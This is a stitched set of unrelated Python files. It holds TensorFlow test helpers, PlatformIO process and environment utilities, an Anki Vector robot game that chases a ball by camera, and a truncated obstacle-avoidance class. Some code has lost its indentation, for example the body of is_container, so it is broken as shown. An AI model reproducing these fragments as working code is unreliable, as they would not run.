    """Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.

    Args:
      np_array: A Numpy ndarray or Numpy scalar.
      tf_tensor: A Tensor.
      msg: Optional message to report on failure.

    Raises:
      TypeError: If the arguments have the wrong type.
    """
    # Validate argument types up front for a clear error message.
    if not isinstance(np_array, (np.ndarray, np.generic)):
        raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
    if not isinstance(tf_tensor, ops.Tensor):
        raise TypeError("tf_tensor must be a Tensor")
    tensor_shape = tf_tensor.get_shape().as_list()
    self.assertAllEqual(np_array.shape, tensor_shape, msg=msg)
def assertDeviceEqual(self, device1, device2, msg=None):
    """Asserts that the two given devices are the same.

    Args:
      device1: A string device name or TensorFlow `DeviceSpec` object.
      device2: A string device name or TensorFlow `DeviceSpec` object.
      msg: Optional message to report on failure.
    """
    # Canonicalize both names so equivalent spellings compare equal.
    canonical1 = pydev.canonical_name(device1)
    canonical2 = pydev.canonical_name(device2)
    failure_message = "Devices %s and %s are not equal. %s" % (
        canonical1, canonical2, msg)
    self.assertEqual(canonical1, canonical2, failure_message)
def _GetPyList(self, a):
    """Converts `a` to a nested python list."""
    if isinstance(a, ragged_tensor.RaggedTensor):
        # Evaluate to a RaggedTensorValue, then flatten to nested lists.
        return self.evaluate(a).to_list()
    elif isinstance(a, ops.Tensor):
        a = self.evaluate(a)
        # evaluate() normally yields an ndarray; pass other values through.
        return a.tolist() if isinstance(a, np.ndarray) else a
    elif isinstance(a, np.ndarray):
        return a.tolist()
    elif isinstance(a, ragged_tensor_value.RaggedTensorValue):
        return a.to_list()
    else:
        # Fallback for plain Python lists, tuples, scalars, etc.
        return np.array(a).tolist()
def _assertRaggedEqual(self, a, b, msg):
    """Asserts that two ragged tensors are equal."""
    a_list = self._GetPyList(a)
    b_list = self._GetPyList(b)
    self.assertEqual(a_list, b_list, msg)

    # Equal values are not enough: the ragged partitioning must also match.
    # Plain Python lists/tuples carry no ragged rank, so skip them.
    if not (isinstance(a, (list, tuple)) or isinstance(b, (list, tuple))):
        a_ragged_rank = a.ragged_rank if ragged_tensor.is_ragged(a) else 0
        b_ragged_rank = b.ragged_rank if ragged_tensor.is_ragged(b) else 0
        self.assertEqual(a_ragged_rank, b_ragged_rank, msg)
def _assertRaggedClose(self, a, b, rtol, atol, msg=None):
    """Asserts ragged tensors are element-wise close within rtol/atol."""
    a_list = self._GetPyList(a)
    b_list = self._GetPyList(b)
    self._assertListCloseRecursive(a_list, b_list, rtol, atol, msg)

    # Also require matching ragged ranks (see _assertRaggedEqual).
    if not (isinstance(a, (list, tuple)) or isinstance(b, (list, tuple))):
        a_ragged_rank = a.ragged_rank if ragged_tensor.is_ragged(a) else 0
        b_ragged_rank = b.ragged_rank if ragged_tensor.is_ragged(b) else 0
        self.assertEqual(a_ragged_rank, b_ragged_rank, msg)
def _assertListCloseRecursive(self, a, b, rtol, atol, msg, path="value"):
    """Recursively compares nested lists/tuples element-by-element.

    `path` tracks the position in the nesting for failure messages.
    """
    self.assertEqual(type(a), type(b))
    if not isinstance(a, (list, tuple)):
        # Leaf values: delegate to the scalar/array closeness check.
        self._assertAllCloseRecursive(a, b, rtol, atol, path, msg)
        return
    self.assertLen(a, len(b), "Length differs for %s" % path)
    for idx, (lhs, rhs) in enumerate(zip(a, b)):
        self._assertListCloseRecursive(lhs, rhs, rtol, atol, msg,
                                       "%s[%s]" % (path, idx))
# Fix Python 3+ compatibility issues
# These class-level aliases keep old test code (written against the Python 2
# unittest API names) working on Python 3.
if not six.PY2:
    # pylint: disable=invalid-name
    # Silence a deprecation warning
    # (assertRaisesRegexp was renamed to assertRaisesRegex in Python 3.)
    assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
    # assertItemsEqual is assertCountEqual as of 3.2.
    assertItemsEqual = googletest.TestCase.assertCountEqual
    # pylint: enable=invalid-name
@contextlib.contextmanager
def _constrain_devices_and_set_default(self, sess, use_gpu, force_gpu):
    """Set the session and its graph to global default and constrain devices."""
    if context.executing_eagerly():
        # Eager mode has no session to install; nothing to constrain.
        yield None
    else:
        with sess.graph.as_default(), sess.as_default():
            if force_gpu:
                # Use the name of an actual device if one is detected, or
                # '/device:GPU:0' otherwise
                gpu_name = gpu_device_name()
                if not gpu_name:
                    gpu_name = "/device:GPU:0"
                with sess.graph.device(gpu_name):
                    yield sess
            elif use_gpu:
                # No device constraint: ops may be placed anywhere.
                yield sess
            else:
                with sess.graph.device("/device:CPU:0"):
                    yield sess
def _create_session(self, graph, config, force_gpu):
    """See session() for details."""

    def prepare_config(config):
        """Returns a config for sessions.

        Args:
          config: An optional config_pb2.ConfigProto to use to configure the
            session.

        Returns:
          A config_pb2.ConfigProto object.
        """
        # TODO(b/114333779): Enforce allow_soft_placement=False when
        # use_gpu=False. Currently many tests rely on the fact that any device
        # will be used even when a specific device is supposed to be used.
        allow_soft_placement = not force_gpu
        if config is None:
            config = context.context().config
            config.allow_soft_placement = allow_soft_placement
        elif not allow_soft_placement and config.allow_soft_placement:
            # force_gpu demands hard placement: start from the context's
            # config and turn soft placement off.
            config_copy = context.context().config
            config = config_copy
            config.allow_soft_placement = False
        # Don't perform optimizations for tests so we don't inadvertently run
        # gpu ops on cpu
        config.graph_options.optimizer_options.opt_level = -1
        # Disable Grappler constant folding since some tests & benchmarks
        # use constant input and become meaningless after constant folding.
        # DO NOT DISABLE GRAPPLER OPTIMIZERS WITHOUT CONSULTING WITH THE
        # GRAPPLER TEAM.
        config.graph_options.rewrite_options.constant_folding = (
            rewriter_config_pb2.RewriterConfig.OFF)
        config.graph_options.rewrite_options.pin_to_host_optimization = (
            rewriter_config_pb2.RewriterConfig.OFF)
        return config

    return ErrorLoggingSession(graph=graph, config=prepare_config(config))
def _get_cached_session(self,
                        graph=None,
                        config=None,
                        force_gpu=False,
                        crash_if_inconsistent_args=True):
    """See cached_session() for documentation."""
    if self._cached_session is not None:
        # Reuse path: optionally verify the caller asked for the same
        # graph/config/force_gpu the cached session was created with.
        if crash_if_inconsistent_args:
            if self._cached_graph is not graph:
                raise ValueError("The graph used to get the cached session is "
                                 "different than the one that was used to create the "
                                 "session. Maybe create a new session with "
                                 "self.session()")
            if self._cached_config is not config:
                raise ValueError("The config used to get the cached session is "
                                 "different than the one that was used to create the "
                                 "session. Maybe create a new session with "
                                 "self.session()")
            if self._cached_force_gpu is not force_gpu:
                raise ValueError(
                    "The force_gpu value used to get the cached session is "
                    "different than the one that was used to create the "
                    "session. Maybe create a new session with "
                    "self.session()")
        return self._cached_session

    # First use: create the session and remember the creation arguments.
    sess = self._create_session(graph=graph, config=config, force_gpu=force_gpu)
    self._cached_session = sess
    self._cached_graph = graph
    self._cached_config = config
    self._cached_force_gpu = force_gpu
    return sess
@tf_export("test.create_local_cluster")
def create_local_cluster(num_workers,
                         num_ps,
                         protocol="grpc",
                         worker_config=None,
                         ps_config=None):
    """Create and start local servers and return the associated `Server` objects.

    "PS" stands for "parameter server": a task responsible for storing and
    updating the model's parameters. Other tasks send updates to these parameters
    as they work on optimizing the parameters. This particular division of labor
    between tasks is not required, but is common for distributed training.

    Read more at https://www.tensorflow.org/guide/extend/architecture

    Figure illustrates the interaction of these components.
    "/job:worker/task:0" and "/job:ps/task:0" are both tasks with worker services.

    Example:
    ```python
    workers, _ = tf.test.create_local_cluster(num_workers=2, num_ps=2)

    worker_sessions = [tf.compat.v1.Session(w.target) for w in workers]

    with tf.device("/job:ps/task:0"):
      ...
    with tf.device("/job:ps/task:1"):
      ...
    with tf.device("/job:worker/task:0"):
      ...
    with tf.device("/job:worker/task:1"):
      ...

    worker_sessions[0].run(...)
    ```

    Args:
      num_workers: Number of worker servers to start.
      num_ps: Number of PS servers to start.
      protocol: Communication protocol. Allowed values are documented in the
        documentation of `tf.distribute.Server`.
      worker_config: (optional) `tf.ConfigProto` to initialize workers. Can be
        used to instantiate multiple devices etc.
      ps_config: (optional) `tf.ConfigProto` to initialize PS servers.

    Returns:
      A tuple `(worker_servers, ps_servers)`.  `worker_servers` is a list
      of `num_workers` objects of type `tf.distribute.Server` (all running
      locally);
      and `ps_servers` is a list of `num_ps` objects of similar type.

    Raises:
      ImportError: if portpicker module was not found at load time
    """
    import portpicker  # pylint: disable=g-import-not-at-top
    # Grab free localhost ports up front so worker and PS tasks can find
    # each other via the cluster spec.
    worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
    ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
    cluster_dict = {
        "worker": ["localhost:%s" % port for port in worker_ports],
        "ps": ["localhost:%s" % port for port in ps_ports]
    }
    cs = server_lib.ClusterSpec(cluster_dict)

    # start=True launches each server immediately.
    workers = [
        server_lib.Server(
            cs,
            job_name="worker",
            protocol=protocol,
            task_index=ix,
            config=worker_config,
            start=True) for ix in range(num_workers)
    ]
    ps_servers = [
        server_lib.Server(
            cs,
            job_name="ps",
            protocol=protocol,
            task_index=ix,
            config=ps_config,
            start=True) for ix in range(num_ps)
    ]

    return workers, ps_servers
def get_node_def_from_graph(node_name, graph_def):
    """Returns the `NodeDef` instance for given node name in the graph def.

    This method explores only the NodeDefs in `graph_def.node`.

    Args:
      node_name: Name of the NodeDef to search for.
      graph_def: An instance of `GraphDef` proto.

    Returns:
      the `NodeDef` instance whose name field matches the given node_name or
      None.
    """
    # First match wins; None when no node carries the requested name.
    return next(
        (node_def for node_def in graph_def.node if node_def.name == node_name),
        None)
def set_producer_version(graph, producer_version):
    """Sets graph.graph_def_versions.producer to `producer_version`."""
    # The C API doesn't expose altering GraphDefVersions. We can indirectly set
    # it via import_graph_def though.
    graph_def = graph_pb2.GraphDef()
    graph_def.versions.producer = producer_version
    with graph.as_default():
        importer.import_graph_def(graph_def)
    # BUG FIX: the original `assert graph.graph_def_versions.producer,
    # producer_version` used the two-argument assert form, which only checked
    # that the producer was truthy (with producer_version as the message) and
    # would pass for any wrong non-zero version. Compare explicitly instead.
    assert graph.graph_def_versions.producer == producer_version, (
        "producer version not set: expected %s, got %s" %
        (producer_version, graph.graph_def_versions.producer))
@contextlib.contextmanager
def _fake_gradient_tape_context_manager():
    """tf.gradients(...) implemented as tf.GradientTape context manager interface.

    This is useful to test tf.gradients() in tests that uses tf.GradientTape().

    Yields:
      gradient tape instance that's implemented by tf.gradients() underneath.
    """
    try:

        class FakeGradientTape:
            """Minimal GradientTape lookalike backed by tf.gradients()."""

            def watch(self, x):
                # tf.gradients() discovers dependencies itself; nothing to do.
                pass

            def gradient(self, y, x, grad_ys=None):
                result = gradients_impl.gradients(y, x, grad_ys)

                # Unlike `tape.gradient()`, `tf.gradients()` returns a list for a single
                # element. So unpack if needed to match `tape.gradient()` behavior.
                if not isinstance(x, (list, tuple)):
                    assert len(result) == 1
                    return result[0]

                return result

        yield FakeGradientTape()
    finally:
        # Nothing to clean up; the try/finally only mirrors the real tape's
        # context-manager protocol.
        pass
class AbstractGradientTape:
    """Abstract GradientTape context manager that has multiple implementations.

    This is useful to test both tf.GradientTape() and tf.gradients() without
    duplicating tests.
    """

    def __init__(self, use_tape, persistent=False):
        # use_tape selects the real eager GradientTape; otherwise the
        # tf.gradients()-backed fake from _fake_gradient_tape_context_manager
        # is used.
        self._use_tape = use_tape
        self._persistent = persistent

    def __enter__(self):
        if self._use_tape:
            self._tape_impl = backprop.GradientTape(persistent=self._persistent)
        else:
            self._tape_impl = _fake_gradient_tape_context_manager()
        return self._tape_impl.__enter__()

    def __exit__(self, exc_type, exc_val, exc_tb):
        # Delegate exit (and any exception info) to the chosen implementation.
        self._tape_impl.__exit__(exc_type, exc_val, exc_tb)
@contextlib.contextmanager
def run_functions_eagerly(run_eagerly):
    """Runs functions eagerly if `run_eagerly` is true.

    WARNING: Setting `run_eagerly` to True in tests running in V1 graph mode
    *WILL NOT* make the tf.function to run eagerly because eager is disabled by
    default in V1. Instead, tf.function will run as a traced graph function.

    Ensures that the state (for running functions eagerly) is back to the initial
    `def_function.RUN_FUNCTIONS_EAGERLY` state.

    Args:
      run_eagerly: Boolean determining whether to run the function eagerly or not.

    Raises:
      ValueError if `run_eagerly` is not a boolean.

    Yields:
      Nothing.
    """
    if not isinstance(run_eagerly, bool):
        raise ValueError(
            "Expected bool for `run_eagerly` but got {}".format(run_eagerly))

    # V1 graph mode cannot honor the flag; warn rather than fail.
    is_eager = context.executing_eagerly()
    if not is_eager and run_eagerly:
        logging.warning(
            "Running tf.function eagerly in V1 graph mode is not supported. "
            "tf.function will be run as a traced graph function.")

    initial_state = def_function.functions_run_eagerly()
    def_function.run_functions_eagerly(run_eagerly)
    try:
        yield
    finally:
        # Always restore the global flag, even if the body raised.
        def_function.run_functions_eagerly(initial_state)
|
proc.py | # Copyright (c) 2014-present PlatformIO <contact@platformio.org>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import subprocess
import sys
from contextlib import contextmanager
from threading import Thread
from platformio import exception
from platformio.compat import (
IS_WINDOWS,
get_filesystem_encoding,
get_locale_encoding,
string_types,
)
class AsyncPipeBase(object):
    """Exposes an OS pipe's write end so a child process can stream into it.

    A background thread runs `do_reading` (implemented by subclasses) on the
    read end, accumulating text into `_buffer`.
    """

    def __init__(self):
        # Child writes to `_fd_write`; our thread reads from `_fd_read`.
        self._fd_read, self._fd_write = os.pipe()
        self._pipe_reader = os.fdopen(self._fd_read, errors="backslashreplace")
        self._buffer = ""
        self._thread = Thread(target=self.run)
        self._thread.start()

    def get_buffer(self):
        # Text accumulated by the reader thread so far.
        return self._buffer

    def fileno(self):
        # File descriptor to hand to subprocess.Popen as stdout/stderr.
        return self._fd_write

    def run(self):
        try:
            self.do_reading()
        except (KeyboardInterrupt, SystemExit, IOError):
            self.close()

    def do_reading(self):
        # Subclasses implement the actual read loop.
        raise NotImplementedError()

    def close(self):
        # NOTE(review): the buffer is reset *before* the reader thread drains
        # remaining pipe data, so a later get_buffer() only returns whatever
        # arrived between this reset and EOF — confirm this is intended.
        self._buffer = ""
        os.close(self._fd_write)
        self._thread.join()
class BuildAsyncPipe(AsyncPipeBase):
    """Async pipe for build output.

    Buffers complete lines for `line_callback`, but switches to raw per-char
    pass-through via `data_callback` when the stream looks like a progress
    indicator (see do_reading).
    """

    def __init__(self, line_callback, data_callback):
        self.line_callback = line_callback
        self.data_callback = data_callback
        super(BuildAsyncPipe, self).__init__()

    def do_reading(self):
        line = ""
        print_immediately = False
        # Read one character at a time until EOF ("" sentinel).
        for char in iter(lambda: self._pipe_reader.read(1), ""):
            self._buffer += char
            # Heuristic: four identical non-whitespace chars in a row
            # (e.g. "...." or "####" progress output) switch to
            # immediate, unbuffered forwarding.
            if line and char.strip() and line[-3:] == (char * 3):
                print_immediately = True

            if print_immediately:
                # leftover bytes
                if line:
                    self.data_callback(line)
                    line = ""
                self.data_callback(char)
                # Immediate mode lasts until the end of the current line.
                if char == "\n":
                    print_immediately = False
            else:
                line += char
                if char != "\n":
                    continue
                # A full line was collected; hand it to the line callback.
                self.line_callback(line)
                line = ""

        self._pipe_reader.close()
class LineBufferedAsyncPipe(AsyncPipeBase):
    """Async pipe that invokes `line_callback` once per complete line."""

    def __init__(self, line_callback):
        self.line_callback = line_callback
        super(LineBufferedAsyncPipe, self).__init__()

    def do_reading(self):
        # readline() returns "" at EOF, which ends the loop.
        while True:
            line = self._pipe_reader.readline()
            if line == "":
                break
            self._buffer += line
            self.line_callback(line)
        self._pipe_reader.close()
def exec_command(*args, **kwargs):
    """Run a subprocess and return dict(out=..., err=..., returncode=...).

    Positional args and extra kwargs are forwarded to subprocess.Popen.
    stdout/stderr default to PIPE but may be AsyncPipeBase instances, in
    which case their buffered output is collected instead.
    """
    result = {"out": None, "err": None, "returncode": None}

    default = dict(stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    default.update(kwargs)
    kwargs = default

    p = subprocess.Popen(*args, **kwargs)
    try:
        result["out"], result["err"] = p.communicate()
        result["returncode"] = p.returncode
    except KeyboardInterrupt:
        raise exception.AbortedByUser()
    finally:
        # Always close async pipes so their reader threads terminate.
        for s in ("stdout", "stderr"):
            if isinstance(kwargs[s], AsyncPipeBase):
                kwargs[s].close()

    # For async pipes communicate() returned None; take the buffered text
    # ("stdout"[3:] == "out", "stderr"[3:] == "err").
    for s in ("stdout", "stderr"):
        if isinstance(kwargs[s], AsyncPipeBase):
            result[s[3:]] = kwargs[s].get_buffer()

    for k, v in result.items():
        # Decode raw bytes using the locale/filesystem encoding, with a
        # latin-1 fallback that never fails.
        if isinstance(result[k], bytes):
            try:
                result[k] = result[k].decode(
                    get_locale_encoding() or get_filesystem_encoding()
                )
            except UnicodeDecodeError:
                result[k] = result[k].decode("latin-1")
        if v and isinstance(v, string_types):
            result[k] = result[k].strip()

    return result
@contextmanager
def capture_std_streams(stdout, stderr=None):
    """Temporarily redirect sys.stdout/sys.stderr to the given stream(s).

    Args:
        stdout: file-like object receiving stdout (and stderr when `stderr`
            is None).
        stderr: optional separate file-like object for stderr.
    """
    prev_stdout = sys.stdout
    prev_stderr = sys.stderr
    sys.stdout = stdout
    sys.stderr = stderr or stdout
    try:
        yield
    finally:
        # BUG FIX: restore the original streams even when the body raises;
        # previously an exception left sys.stdout/sys.stderr redirected for
        # the rest of the process.
        sys.stdout = prev_stdout
        sys.stderr = prev_stderr
def is_ci():
    """Return True when running under a CI service (env var CI == "true")."""
    ci_flag = os.environ.get("CI", "")
    return ci_flag.lower() == "true"
def is_container():
if os.path.exists("/.dockerenv"):
return True
if not os.path.isfile("/proc/1/cgroup"):
return False
with open("/proc/1/cgroup") as fp:
return ":/docker/" in fp.read()
def get_pythonexe_path():
    """Return the Python interpreter path (PYTHONEXEPATH env override wins)."""
    default_exe = os.path.normpath(sys.executable)
    return os.environ.get("PYTHONEXEPATH", default_exe)
def copy_pythonpath_to_osenv():
    """Propagate the interpreter's sys.path entries into $PYTHONPATH.

    On non-Windows platforms only paths that actually contain the `click`
    or `platformio` packages are copied, to keep the variable short.
    """
    _PYTHONPATH = []
    if "PYTHONPATH" in os.environ:
        _PYTHONPATH = os.environ.get("PYTHONPATH").split(os.pathsep)
    for p in os.sys.path:
        # Skip entries already present; on POSIX also require the path to
        # host one of the packages we care about.
        conditions = [p not in _PYTHONPATH]
        if not IS_WINDOWS:
            conditions.append(
                os.path.isdir(os.path.join(p, "click"))
                or os.path.isdir(os.path.join(p, "platformio"))
            )
        if all(conditions):
            _PYTHONPATH.append(p)
    os.environ["PYTHONPATH"] = os.pathsep.join(_PYTHONPATH)
def where_is_program(program, envpath=None):
    """Locate `program` on PATH; return its absolute path or the bare name.

    Args:
        program: executable name to look up.
        envpath: optional PATH value to use for the lookup.
    """
    env = os.environ
    if envpath:
        # NOTE(review): this mutates the real process environment, not a
        # copy — confirm callers expect PATH to stay modified.
        env["PATH"] = envpath

    # try OS's built-in commands
    try:
        result = exec_command(["where" if IS_WINDOWS else "which", program], env=env)
        if result["returncode"] == 0 and os.path.isfile(result["out"].strip()):
            return result["out"].strip()
    except OSError:
        pass

    # look up in $PATH
    for bin_dir in env.get("PATH", "").split(os.pathsep):
        if os.path.isfile(os.path.join(bin_dir, program)):
            return os.path.join(bin_dir, program)
        if os.path.isfile(os.path.join(bin_dir, "%s.exe" % program)):
            return os.path.join(bin_dir, "%s.exe" % program)

    # Fall back to the bare name and let the caller's shell resolve it.
    return program
def append_env_path(name, value):
    """Append `value` to the os.pathsep-separated environment variable `name`.

    Does nothing when `value` is already one of the entries.

    Args:
        name: environment variable name.
        value: path entry to append.

    Returns:
        The resulting value of the environment variable.
    """
    cur_value = os.environ.get(name) or ""
    if cur_value and value in cur_value.split(os.pathsep):
        return cur_value
    # BUG FIX: when the variable was unset or empty, the original joined
    # ["", value] and produced a value with a leading separator (":/path").
    parts = [cur_value, value] if cur_value else [value]
    os.environ[name] = os.pathsep.join(parts)
    return os.environ[name]
def force_exit(code=0):
    """Terminate the process immediately, bypassing atexit/finally handlers."""
    os._exit(code)  # pylint: disable=protected-access
|
Main.py | import threading
import sys
import time
import anki_vector
import numpy as np
from random import randint
from cv2 import cv2
from anki_vector.util import distance_mm, speed_mmps, degrees, Angle, Pose
from anki_vector.events import Events
import math
def handle_object_observed(robot, event_type, event):
    """whenever the CustomMarker used for the goal comes into view the observed position becomes the new goal position

    :param robot: instance of robot
    :param event_type: default parameter
    :param event: default parameter
    """
    for obj in robot.world.visible_custom_objects:
        # CustomType00 is the wall/marker registered in initialize() as the goal.
        if obj.custom_type == anki_vector.objects.CustomObjectTypes.CustomType00:
            robot.goal_pose = obj.pose
def drive_for_search(robot):
    """Turn in place to look for the ball

    :param robot: instance of the robot
    """
    # Runs forever on its own thread (started by the main script below).
    while True:
        # While the vision loop reports no ball, spin in place for a random
        # 2-4 s interval before re-issuing the command.
        while robot.ball_not_found:
            robot.motors.set_wheel_motors(-15, 15)
            time.sleep(randint(2, 4))
        # NOTE(review): once the ball is found, this outer loop busy-spins
        # with no sleep until ball_not_found flips back — confirm intended.
def getMiddleOfElement_area(img, bildRGB):
    """Analyze the "white spots" (candidate ball contours) found in search_ball.

    :param img: binary mask image for analyzing
    :param bildRGB: image for plotting the result on the screen
    :return: if middle of ball is found and it's size and vertical position
    :rtype: bool, int, double, bool
    """
    contours, hierarchy = cv2.findContours(img, cv2.RETR_EXTERNAL,
                                           cv2.CHAIN_APPROX_SIMPLE)
    for cnt in contours:
        area = cv2.contourArea(cnt)
        # Ignore tiny specks (noise) below 20 px^2.
        if area > 20:
            if area > 3500:
                print("BALLL")
                return True, 640/2, area, True  # Ball found and close to it
            print(area)
            try:
                # Compute the middle of the area identified as the ball:
                M = cv2.moments(cnt)
                cX = int(M["m10"] / M["m00"])
                cY = int(M["m01"] / M["m00"])
                cv2.circle(bildRGB, (cX, cY), 7, (255, 255, 255), -1)
                return True, cX, area, False  # Ball found, but not close enough
            except ZeroDivisionError:
                # BUG FIX: the original bare `except:` silently swallowed every
                # error (including programming mistakes); only a degenerate
                # contour with zero moment m00 is expected here.
                pass
    # NOTE: the original also defined an unused `found_cont` flag; removed.
    return False, 640/2, None, False  # Ball not found
def change_direction(area, middle):
    """Turn towards the ball in order to drive straight to it.

    Turn faster if the ball is at the border of the robots view, drive faster
    if the ball is far away

    :param area: size from ball on captured image
    :param middle: horizontal position from ball
    """
    # Horizontal offset from the image center (camera frame is 640 px wide).
    d = middle - 320
    # Speed factor shrinks as the detected area grows (ball getting closer).
    a = math.sqrt(50 / area) / 2
    # NOTE(review): relies on the module-level `robot` global rather than a
    # parameter, and the second set_wheel_motors call immediately overrides
    # the first (turn) command — confirm that this is the intended behavior.
    robot.motors.set_wheel_motors(80 * d / 320, -80 * d / 320)
    robot.motors.set_wheel_motors(60 * a + 60, 60 * a + 60)
def search_ball(robot):
    """Search the ball on captured pictures (main vision loop).

    :param robot: instance of robot
    """
    print("searching ball")
    # Counter how many camera images without finding the ball:
    frames = 0
    while True:
        # Grab the latest camera frame and build a blurred HSV copy for masking.
        img = np.array(robot.camera.latest_image.raw_image)
        bildRGB = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)
        bildBlur = cv2.GaussianBlur(bildRGB, (3, 3), 1)
        bildHSV = cv2.cvtColor(bildBlur, cv2.COLOR_BGR2HSV)
        imgHSV = bildHSV
        # HSV color range of the ball; presumably tuned empirically — confirm.
        lower = np.array([0, 116, 148])
        upper = np.array([30, 229, 255])
        mask = cv2.inRange(imgHSV, lower, upper)
        imgContour = img.copy()
        success, middle, area, goal = getMiddleOfElement_area(mask, bildRGB)
        # Show the camera image and the computed results from above:
        cv2.namedWindow("Camera")
        cv2.imshow("Camera", bildRGB)
        cv2.namedWindow("Mask")
        cv2.imshow("Mask", mask)
        # Ball found?:
        if success == True:
            robot.ball_not_found = False
            frames = 0
            # Raise the lift while approaching so the ball can be captured.
            if robot.drivegoal == False:
                robot.behavior.set_lift_height(1.0)
            if goal == True and robot.drivegoal == False:
                # Ball reached: drop the lift onto it and line up with the goal.
                robot.behavior.set_lift_height(0.0)
                robot.motors.stop_all_motors()
                print("drive_to_goal")
                robot.behavior.drive_straight(distance_mm(-150), speed_mmps(100))
                print("I got the ball.")
                # Offsets from the goal pose (robot pose is in mm).
                x = robot.goal_pose.position.x - robot.pose.position.x
                y = robot.pose.position.y
                distance_to_goal = math.sqrt(x * x + y * y)
                angle_to_goal = np.rad2deg(np.arcsin(x / distance_to_goal))
                print("alpha:", angle_to_goal)
                # Decide whether to turn clockwise or counterclockwise:
                if y > 0:
                    robot.behavior.turn_in_place(degrees(-(90 - angle_to_goal)), is_absolute=True)
                else:
                    robot.behavior.turn_in_place(degrees((90 - angle_to_goal)), is_absolute=True)
                # Drive to the goal and check if yet reached.
                robot.motors.set_wheel_motors(100, 100)
                robot.drivegoal = True
                drive_goal = threading.Thread(target=drive_to_goal, args=[robot, x, y])
                drive_goal.start()
            elif robot.drivegoal == False:
                # Ball visible but not yet close: steer toward it.
                change_direction(area, middle)
        else:  # not found
            frames = frames + 1
            if (frames > 1):  # Threshold to avoid false positives
                robot.drivegoal = False
                robot.ball_not_found = True
        if cv2.waitKey(1) & 0xFF == ord('q'):
            robot.disconnect()
            sys.exit()
    # Unreachable: the while-True loop only exits via sys.exit() above.
    return False
def drive_to_goal(robot, x, y):
    """Check whether the robot is already at the goal. If so, stop, otherwise drive to goal

    :param robot: instance of robot
    :param x: vertical distance between goal and robot
    :param y: horizontal distance between goal and robot
    """
    while robot.drivegoal:
        # Re-read the remaining offsets each pass while the robot drives.
        x = robot.goal_pose.position.x - robot.pose.position.x
        y = robot.pose.position.y
        # NOTE(review): `x < 50` (not abs(x)) also accepts overshoot past
        # the goal — confirm this is the intended stop condition.
        if x < 50 and abs(y) < 50:
            print("Goal")
            robot.drivegoal = False
            robot.disconnect()
            # sys.exit() ends this thread; the break below is unreachable.
            sys.exit()
            break
    robot.motors.stop_all_motors()
    return
def map(robot):
    """Map to track the robot's path during the game

    Note: keeps its original name even though it shadows the builtin ``map``
    — the thread launcher below references it by this name.

    :param robot: instance of robot
    """
    # Playfield drawn at 3 px per cm (160 cm x 100 cm).
    map_height = 160 * 3
    map_widht = 100 * 3
    blank_image = np.zeros(shape=[map_height, map_widht, 3], dtype=np.uint8)
    # Start marker (green circle) and goal line (blue rectangle).
    cv2.circle(blank_image, center=(150, map_height - 15 * 3), radius=4, color=(0, 255, 0), thickness=20)  # Start
    cv2.rectangle(blank_image, (40 * 3, 0), (60 * 3, 6), (255, 0, 0), 12)
    while True:
        # Robot pose is in mm; convert to cm for plotting.
        xcm = int(robot.pose.position.x / 10)
        ycm = int(robot.pose.position.y / 10)
        cv2.circle(blank_image, center=(150 - ycm * 3, map_height - (15 * 3 + xcm * 3)), radius=2, color=(0, 0, 255), thickness=2)
        # Status line: red while the ball is lost, green when tracked.
        if (robot.ball_not_found):
            cv2.putText(blank_image, "Ball not found ", (1, map_height - 5), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (255, 0, 0))
        else:
            cv2.putText(blank_image, "Ball found ", (1, map_height - 5), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (0, 255, 0))
        cv2.namedWindow("map")
        cv2.imshow("map", blank_image)
        if cv2.waitKey(1) & 0xFF == ord('q'):
            sys.exit()
def initialize():
    """Initialize the robot and the game constraints

    :return: instance of Robot()
    :rtype: robot
    """
    robot = anki_vector.Robot()
    robot.connect()
    robot.camera.init_camera_feed()
    robot.behavior.set_lift_height(0.0)
    robot.behavior.set_head_angle(degrees(0))
    # Default goal: 15 cm before the far end of the 160 cm field (pose in mm).
    robot.goal_pose = Pose(x=(160 - 15) * 10, y=0, z=0, angle_z=anki_vector.util.Angle(degrees=0))
    # Refresh the goal pose whenever the goal marker is observed.
    robot.events.subscribe(handle_object_observed, Events.object_observed)
    robot.enable_custom_object_detection = True
    robot.world.define_custom_wall(anki_vector.objects.CustomObjectTypes.CustomType00, anki_vector.objects.CustomObjectMarkers.Triangles5, width_mm=200.0, height_mm=300.0, marker_width_mm=170.0, marker_height_mm=170.0)
    robot.behavior.say_text("I'm ready!")
    # Shared state flags read/written by the worker threads.
    robot.ball_not_found = True
    robot.drivegoal = False
    return robot
# Starting the robot and afterwards the game:
robot = initialize()
print("robot started")

# Starting the map:
initmap = threading.Thread(target=map, args=[robot])
initmap.start()
print("Map started")

# Starting searching Thread:
drive_around_thread = threading.Thread(target=drive_for_search, args=[robot])
drive_around_thread.start()
print("drive_around started")

# The vision loop blocks the main thread until 'q' quits the program.
search_ball(robot)
|
avoidance.py | from src.motors_pwm import *
from src.distance import *
import threading
import time
class Avoidance():
    """Background obstacle avoidance using an ultrasonic distance sensor.

    Starts a worker thread on construction that backs the robot up whenever
    an obstacle is detected in front of it.
    """

    def __init__(self, motors_obj):
        self.motors_obj = motors_obj
        # Set up the ultrasonic sensor (from the src.distance star import).
        distance_init()
        self.speed = 30
        # Obstacle distance threshold in sensor units — presumably cm; confirm.
        self.near_threshold = 15
        thread = threading.Thread(target=self._thread)
        thread.start()

    # Return True if the ultrasonic sensor sees an obstacle
    def is_near_obstacle(self):
        distance = get_distance()
        # print("IsNearObstacle: "+str(Distance))
        # Readings <= 0 indicate a failed measurement; treat as no obstacle.
        if distance < self.near_threshold and distance > 0:
            return True
        else:
            return False

    # Move back a little, then turn right
    def avoid_obstacle(self):
        # Back off a little
        self.motors_obj.a_backwards(self.speed)
        self.motors_obj.b_backwards(self.speed)
        time.sleep(0.5)
        self.motors_obj.all_motors_off()
        '''
